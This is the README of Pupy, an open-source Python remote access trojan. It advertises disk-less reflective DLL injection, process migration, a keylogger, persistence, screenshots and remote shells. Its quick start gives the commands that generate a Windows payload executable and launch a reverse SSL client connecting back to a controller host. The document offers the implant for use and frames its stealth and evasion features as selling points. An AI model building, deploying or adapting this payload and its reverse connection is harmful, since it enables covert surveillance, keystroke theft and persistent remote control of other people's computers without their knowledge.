# Pupy Pupy is an opensource RAT (Remote Administration Tool) written in Python. Pupy uses reflective dll injection and leaves no traces on disk. ## Features : - On windows, the Pupy payload is compiled as a reflective DLL and the whole python interpreter is loaded from memory. Pupy does not touch the disk :) - Pupy can reflectively migrate into other processes - Pupy can remotely import, from memory, pure python packages (.py, .pyc) and compiled python C extensions (.pyd). The imported python modules do not touch the disk. (.pyd mem import currently work on Windows only, .so memory import is not implemented). - modules are quite simple to write and pupy is easily extensible. - Pupy uses rpyc (https://github.com/tomerfiliba/rpyc) and a module can directly access python objects on the remote client - we can also access remote objects interactively from the pupy shell and even auto completion of remote attributes works ! - communication channel currently works as a ssl reverse connection, but a bind payload will be implemented in the future - all the non interactive modules can be dispatched on multiple hosts in one command - Multi-platform (tested on windows 7, windows xp, kali linux, ubuntu) - modules can be executed as background jobs - commands and scripts running on remote hosts are interruptible - auto-completion and nice colored output :-) - commands aliases can be defined in the config ## Implemented Modules : - migrate (windows only) - inter process architecture injection also works (x86->x64 and x64->x86) - keylogger (windows only) - persistence (windows only) - screenshot (windows only) - command execution - download - upload - socks5 proxy - interactive shell (cmd.exe, /bin/sh, ...) - interactive python shell ##Quick start In these examples the server is running on a linux host (tested on kali linux) and it's IP address is 192.168.0.1 The clients have been tested on (Windows 7, Windows XP, kali linux, ubuntu, Mac OS X 10.10.5) ### generate/run a payload #### for Windows ```bash ./genpayload.py 192.168.0.1 -p 443 -t exe_x86 -o pupyx86.exe ``` #### for Linux ```bash pip install rpyc #(or manually copy it if you are not admin) python reverse_ssl.py 192.168.0.1:443 ``` #### for MAC OS X ```bash easy_install rpyc #(or manually copy it if you are not admin) python reverse_ssl.py 192.168.0.1:443 ``` ### having fun 1. eventually edit pupy.conf to change the bind address / port 2. start the pupy server : ```bash ./pupysh.py ``` 3. type "clients" to display connected clients ### Some screenshots #####list connected clients ![screenshot1](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/scr1.png "screenshot1") #####help ![screenshot3](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/help.png "screenshot3") #####execute python code on all clients ![screenshot2](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/scr2.png "screenshot2") #####execute a command on all clients, exception is retrieved in case the command does not exists ![screenshot4](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/scr3.png "screenshot4") #####use a filter to send a module only on selected clients ![screenshot5](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/filters.png "screenshot5") #####migrate into another process ![screenshot6](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/migrate.png "screenshot6") ## Dependencies rpyc (https://github.com/tomerfiliba/rpyc) ## Contact Don't hesitate to send me your feedback or any issue you may find mail: contact@n1nj4.eu [Follow me on twitter](https://twitter.com/n1nj4sec)